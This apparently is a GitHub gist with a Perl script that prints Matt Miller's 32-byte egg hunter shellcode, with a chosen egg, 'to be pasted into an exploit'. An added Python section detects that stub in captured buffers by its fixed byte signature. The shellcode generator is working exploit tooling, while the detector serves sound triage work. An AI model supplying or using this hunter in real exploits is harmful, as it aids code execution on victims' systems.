@ruvolof ruvolof/egghunter.pl

Last active Nov 17, 2019
Generates 32-byte egg hunter code, based on Matt Miller's implementation.
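```perl
#!/usr/bin/perl
# Prints egghunter code to be pasted into an exploit.
# Example:
# $ ./egghunter.pl 41424344
use strict;
use warnings;

# The egg must be exactly 8 hex digits (4 bytes); reject anything else so
# printf never receives missing or malformed values for its placeholders.
my $egg = $ARGV[0] // '';
die "Usage: $0 <8 hex digits, e.g. 41424344>\n" unless $egg =~ /\A[0-9a-fA-F]{8}\z/;

# This is the egghunter implementation by Matt Miller; the four bytes of
# $ARGV[0] are placed where the egg goes (the four %s placeholders).
my $egghunter = "\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\\x%s\\x%s\\x%s\\x%s\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7";

# Split the egg into two-character hex pairs, one per placeholder.
my @chars = ($egg =~ m/../g);
print("# Egghunter 32 bytes - Egg: $egg\n\n");
printf($egghunter, @chars);
print("\n");
```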
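Because only the four egg bytes vary, the stub printed by this script has a fixed signature that is useful for triage. The following is an added example, not part of the original gist: it scans a captured buffer for the 32-byte hunter with the egg wildcarded, reports the egg, and lists offsets where the egg occurs twice in a row (the hunter's two `scasd` comparisons require a doubled tag). The function name, result keys and sample buffer are constructed for illustration.

```python
import re

# Fixed bytes of the 32-byte hunter taken from the script above. The four
# bytes that follow the 0xb8 opcode are the egg and are wildcarded.
PREFIX = bytes.fromhex("6681caff0f42526a0258cd2e3c055a74efb8")
SUFFIX = bytes.fromhex("8bfaaf75eaaf75e7ffe7")
# DOTALL so that an egg containing 0x0a still matches the wildcard.
HUNTER_RE = re.compile(re.escape(PREFIX) + b"(.{4})" + re.escape(SUFFIX), re.DOTALL)


def find_egghunters(buf: bytes):
    """Return one finding per hunter stub found in buf.

    Each finding holds the stub offset, the egg as hex, and every offset
    where the egg appears doubled (the marker the hunter searches for).
    """
    findings = []
    for m in HUNTER_RE.finditer(buf):
        egg = m.group(1)
        tag = egg + egg
        tagged = []
        pos = buf.find(tag)
        while pos != -1:
            tagged.append(pos)
            pos = buf.find(tag, pos + 1)
        findings.append(
            {"offset": m.start(), "egg": egg.hex(), "tagged_offsets": tagged}
        )
    return findings


# Constructed sample: padding, a hunter with egg 41424344, filler, then the
# doubled egg followed by placeholder bytes standing in for tagged data.
SAMPLE_EGG = bytes.fromhex("41424344")
SAMPLE = (
    b"\x00" * 16 + PREFIX + SAMPLE_EGG + SUFFIX
    + b"\x90" * 8 + SAMPLE_EGG * 2 + b"\xcc" * 4
)

if __name__ == "__main__":
    for f in find_egghunters(SAMPLE):
        print(f"hunter at {f['offset']:#x}, egg {f['egg']}, "
              f"doubled egg at {[hex(o) for o in f['tagged_offsets']]}")
```

A hit with an empty `tagged_offsets` list means the stub is present but the tagged data is not in the same buffer, which is expected when the two are delivered separately.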